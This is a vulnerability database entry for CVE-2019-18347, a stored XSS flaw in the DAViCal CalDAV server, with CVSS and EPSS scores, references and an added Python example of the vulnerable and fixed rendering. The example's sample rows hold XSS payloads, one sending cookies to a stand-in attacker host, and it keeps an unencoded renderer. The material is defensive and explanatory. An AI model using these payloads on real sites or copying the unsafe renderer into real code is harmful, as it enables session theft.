Vulnerability Details : CVE-2019-18347
A stored (persistent) XSS issue was discovered in DAViCal through 1.1.8. The application does not adequately encode, on output, several fields that unprivileged users can set, so JavaScript stored in those fields is executed in the browser of another (possibly privileged) user who views a page that displays them. Affected database fields include Username, Display Name, and Email.
Vulnerability category: Cross site scripting (XSS)
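As an added illustration of the pattern the description above refers to (example code, not DAViCal's own), the following Python shows a user listing rendered by plain string interpolation, the same row with context-appropriate output encoding, and a triage check that scans stored field values for markup. The column names `username`, `fullname` and `email`, the admin URL shape, and the sample rows with their payloads are constructed assumptions for this example, not DAViCal's schema or real data.

```python
import html
import re
from urllib.parse import quote

# Constructed sample rows modelled on the three fields the advisory names
# (Username, Display Name, Email). Column names, the admin URL below and the
# payloads are assumptions made for this example, not DAViCal's schema or data.
SAMPLE_USERS = [
    {"username": "alice", "fullname": "Alice Example", "email": "alice@example.org"},
    {"username": "mallory",
     "fullname": "<script>new Image().src='https://attacker.invalid/?c='+document.cookie</script>",
     "email": "mallory@example.org"},
    {"username": 'bob" onmouseover="alert(1)', "fullname": "Bob", "email": "bob@example.org"},
]

ADMIN_EDIT_URL = "/admin.php?action=edit&username="  # assumed URL shape for the example


def render_user_row_vulnerable(user: dict) -> str:
    """Stored-XSS pattern: database fields interpolated straight into HTML.

    Whatever an unprivileged user stored in these fields is emitted verbatim,
    so the browser of the administrator viewing the listing executes it."""
    return (
        f'<tr><td><a href="{ADMIN_EDIT_URL}{user["username"]}">{user["username"]}</a></td>'
        f'<td>{user["fullname"]}</td><td>{user["email"]}</td></tr>'
    )


def render_user_row_fixed(user: dict) -> str:
    """Same row with output encoding chosen per context.

    Text and attribute values get HTML entity encoding (quote=True also
    encodes " and ', which matters inside attributes); the username placed in
    the URL query string is percent-encoded first, then attribute-encoded."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)

    href = esc(ADMIN_EDIT_URL + quote(user["username"], safe=""))
    return (
        f'<tr><td><a href="{href}">{esc(user["username"])}</a></td>'
        f'<td>{esc(user["fullname"])}</td><td>{esc(user["email"])}</td></tr>'
    )


_MARKUP_CHARS = re.compile(r'[<>"\']')


def find_markup(users: list) -> list:
    """Triage helper: (username, field) pairs whose stored value contains
    characters that become dangerous when a page fails to encode them.
    Useful for finding already-planted payloads before and after patching."""
    hits = []
    for user in users:
        for field in ("username", "fullname", "email"):
            if _MARKUP_CHARS.search(user[field]):
                hits.append((user["username"], field))
    return hits


if __name__ == "__main__":
    for user in SAMPLE_USERS:
        print("vulnerable:", render_user_row_vulnerable(user))
        print("fixed:     ", render_user_row_fixed(user))
    print("rows carrying markup:", find_markup(SAMPLE_USERS))
```

Note that the hardened row still contains the attacker's text, just rendered inert; the fix is encoding at the point of output, not stripping characters at the point of storage, so display names that legitimately contain `&` or `<` survive intact.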
Products affected by CVE-2019-18347
- cpe:2.3:a:davical:davical:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2019-18347
0.16%: probability of exploitation activity in the next 30 days (EPSS score)
~52%: percentile, the proportion of scored vulnerabilities with an EPSS score at or below this one
CVSS scores for CVE-2019-18347
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N | 6.8 | 2.9 | NIST |
5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | 2.3 | 2.7 | NIST |
CWE ids for CVE-2019-18347
- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. (Assigned by nvd@nist.gov, primary)
References for CVE-2019-18347
- https://gitlab.com/davical-project/davical/blob/master/ChangeLog (ChangeLog · master · DAViCal Project / DAViCal · GitLab) [Release Notes; Third Party Advisory]
- https://seclists.org/bugtraq/2019/Dec/30 (Bugtraq: [SECURITY] [DSA 4582-1] davical security update)
- https://www.debian.org/security/2019/dsa-4582 (Debian -- Security Information -- DSA-4582-1 davical)
- https://www.davical.org/ (DAViCal - DAViCal Home) [Product]
- http://packetstormsecurity.com/files/155628/DAViCal-CalDAV-Server-1.1.8-Persistent-Cross-Site-Scripting.html (DAViCal CalDAV Server 1.1.8 Persistent Cross Site Scripting ≈ Packet Storm) [Third Party Advisory]
- http://seclists.org/fulldisclosure/2019/Dec/17 (Full Disclosure: CVE-2019-18347 Persistent Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV Server) [Third Party Advisory]
- https://hackdefense.com/publications/cve-2019-18347-davical-caldav-server-vulnerability/ (CVE-2019-18347 Persistent Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV Server – HackDefense) [Exploit; Third Party Advisory]
- https://lists.debian.org/debian-lts-announce/2019/12/msg00016.html ([SECURITY] [DLA 2034-1] davical security update)
- http://seclists.org/fulldisclosure/2019/Dec/18 (Full Disclosure: CVE-2019-18346 Cross-Site Request Forgery (CSRF) vulnerability in DAViCal CalDAV Server) [Third Party Advisory]
- http://seclists.org/fulldisclosure/2019/Dec/19 (Full Disclosure: CVE-2019-18345 Reflected Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV Server) [Third Party Advisory]